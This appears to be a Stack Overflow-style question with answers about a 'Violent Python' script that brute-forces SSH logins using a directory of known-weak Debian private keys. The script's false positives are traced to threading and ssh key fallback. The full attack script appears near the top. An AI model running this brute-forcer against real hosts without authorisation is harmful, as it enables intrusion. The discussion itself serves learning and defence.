# Weak Debian SSH Keys Python Script Cryptic auth.log

Tags: python, linux, security, ssh, debian

So I am reading this awesome book, "Violent Python". And in Chapter 2 there is a Python script that uses private keys to authenticate to a Debian machine or possibly any machine running an SSH server that has users on it without strong private keys. Below is the script:

```
#! /usr/bin/env python

import pexpect
import optparse
import os
from threading import *

maxConnections = 5
connection_lock = BoundedSemaphore(value=maxConnections)
Stop = False
Fails = 0

def connect(user, host, keyfile, release):
    global Stop
    global Fails
    try:
        perm_denied = 'Permission denied'
        ssh_newkey = 'Are you sure you want to continue'
        conn_closed = 'Connection closed by remote host'
        opt = ' -o PasswordAuthentication=no'
        connStr = 'ssh ' + user + \
                  '@' + host + ' -i ' + keyfile + opt
        child = pexpect.spawn(connStr)
        ret = child.expect([pexpect.TIMEOUT, perm_denied, \
                            ssh_newkey, conn_closed, '$', '#',])
        if ret == 2:
            print '[-] Adding Host to ~/.ssh/known_hosts'
            child.sendline('yes')
            connect(user, host, keyfile, False)
        elif ret == 3:
            print '[-] Connection Closed By Remote Host'
            Fails += 1
        elif ret > 3:
            print '[+] Success. ' + str(keyfile)
            Stop = True
    finally:
        if release:
            connection_lock.release()

def main():
    parser = optparse.OptionParser('usage%prog -H ' + \
                                   '<target host> -u <user> -d <directory>')
    parser.add_option('-H', dest='tgtHost', type='string', \
                      help='specify target host')
    parser.add_option('-d', dest='passDir', type='string', \
                      help='specify directory with keys')
    parser.add_option('-u', dest='user', type='string', \
                      help='specify the user')
    (options, args) = parser.parse_args()
    host = options.tgtHost
    passDir = options.passDir
    user = options.user
    if host == None or passDir == None or user == None:
        print parser.usage
        exit(0)

    for filename in os.listdir(passDir):
        if Stop:
            print '[*] Exiting: Key Found.'
            exit(0)
        if Fails > 5:
            print '[!] Exiting: '+ \
                  'Too Many Connections Closed By Remote Host.'
            print '[!] Adjust number of simultaneous threads.'
            exit(0)

        connection_lock.acquire()
        fullpath = os.path.join(passDir, filename)
        print '[-] Testing keyfile ' + str(fullpath)
        t = Thread(target=connect, \
                   args=(user, host, fullpath, True))
        child = t.start()

if __name__ == '__main__':
    main()
```

The weird thing is when I run this on my internal LAN against a copy of Kali, that is based on Debian, the Python script prints that it has found some vulnerable private keys. I am not sure why it finds *several* vulnerable keys though for a single user on the OS. When I run the script I specify 1) a host, 2) a username, and 3) a directory full of private keys generated by HD Moore. I had to use the wayback machine to obtain the RSA private keys he generated for the 2048 strength asymmetric algorithm.

Example output:

```
[-] Testing keyfile rsa/2048/0002d5af29276c95a49dc2ab3b506707-23747
[-] Testing keyfile rsa/2048/00030d8fbf8ef4e6c7c878e5a3700192-29213
[+] Success. rsa/2048/.DS_Store
[+] Success. rsa/2048/0002d5af29276c95a49dc2ab3b506707-23747
[-] Testing keyfile rsa/2048/0004c120c8d0b5820c5d84d35e3c8d19-20980
[*] Exiting: Key Found.
[+] Success. rsa/2048/0004c120c8d0b5820c5d84d35e3c8d19-20980
[+] Success. rsa/2048/00030d8fbf8ef4e6c7c878e5a3700192-29213
```

Anyways, why does the script say it found numerous private keys for my username on my Debian Kali virtual machine (VM)? I tried to log in with the apparently vulnerable private key with the `ssh -irsa/2048/0002d5af29276c95a49dc2ab3b506707-23747 root@192.168.1.11 -o PasswordAuthentication=no` command but it did not work. Why does it not work? Is the Python script not actually doing what it says it is doing? X-Ray Glasses anyone? Let me go on...

Then I checked the `/var/log/auth.log` on my Debian Kali VM and it has some interesting and mysterious entries. The log says, `Public key <Hexadecimal colon separated key> from <IP> blacklisted (see ssh-vulnkey(1))`

I read the man page for the `ssh-vulnkey` on the Debian Kali OS and found out that this program could find vulnerable keys on a computer. I tried running this with the `-v verbose` option and saw that some keys are apparently vulnerable, though I do not understand what the f key is going on.

Does anyone have an easy to understand explanation about 1) why the script returns results that it successfully found a key(s) and 2) what the blacklisted `auth.log` message means? Also, 3) if it found a vulnerable key why can I not use said key to log into my computer?

Also, should this be moved to `information-security`?

Wicked Python script by:

O'Connor, TJ (2012-12-28). Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers. Elsevier Science. Kindle Edition.

Answer (score 1):

As far as I can tell the script just iterates through the directory and tries to use them as keys to connect to the given SSH server. This is done in threads, so the order of your output is not deterministic. Since we check if the global `Stop` flag is `True` before starting new threads it may happen that not all files are checked because one earlier thread already finished successfully and set the flag. This is why it reports that it *found a key*.

Your SSH daemon blacklists weak keys that were generated by a broken version of OpenSSL. This is a good thing and you can read about it [here](https://wiki.debian.org/SSLkeys#Identifying_Weak_Keys). That is also why you can't login.

`ssh` automatically falls back to looking for valid keys in your configuration directory. So the connection does actually succeed, but your command line argument is ignored. Try running the command with `-vvv` and observe the output:

```
$ ssh user@host -i not-a-key -o PasswordAuthentication=no -vvv
[...]
debug1: identity file /path/to/not-a-key type -1
[...]
```

Comment: That is an excellent tip to use the `-vvv` verbose option when trying to log in. :D I just tried that and received a huge log of information that basically amounted to access-denied. I am still wondering why the same user on the operating-system would have multiple matches for private keys that would presumably authenticate them. 0_o Thanks for the help!

Comment: Glad that helped! My guess was that there aren't actually multiple keys that authenticate them. But that your script does not account for ssh falling back to trying all available keys. I ran the script on my system and it told me that the `known_hosts` file matches, which can't possibly be true.

Comment: Yes, thank-you again. My theory is, the algorithm is based on the return codes and lumping all the strange return codes into `> 3` condition, which is a false positive most likely as you described in your latest comment. I may change the script I found to print the return code out so I can try to determine where the false positive is coming from because I have serious doubts this script is finding weak keys. Thank-you again Stephan for the helpful feedback.  :D What do you mean by the way, "...script does not account for ssh falling back to all available keys"?

Comment: Even if you specify an invalid keyfile to `ssh` using the `-i` option it will still try to recover from this by scanning through your configuration dictionary (usually `~/.ssh`) to find a good key for the given server. If you can usually connect to a server with the command `ssh user@server` you can also connect with `ssh user@server -i not-the-key` since it will fall back to the good key in your configuration dictionary.

Comment: I am not sure I know what you mean. I printed out the return values to determine why I have so many apparently 'successful' private keys and saw that is was returning the number 4 which is the '$' Bash shell symbol element in the `expect` method/function in the script. I think some of these keys may somehow return sometime of BASH prompt from the SSH server. I researched the API for the `expect` method and saw that it returns a number, starting from zero, depending on the elements passed as arguments to it.

Comment: The sentence, "I think some of these keys may somehow return sometime of BASH prompt from the SSH server", has an obvious grammatical error. I was trying to say some of the keys for some reason obtain some type of BASH prompt ($) but I really doubt this is an authenticated shell on the OS. Well I am glad that my OS is not vulnerable. Maybe some pen-testers will reply with some interesting information...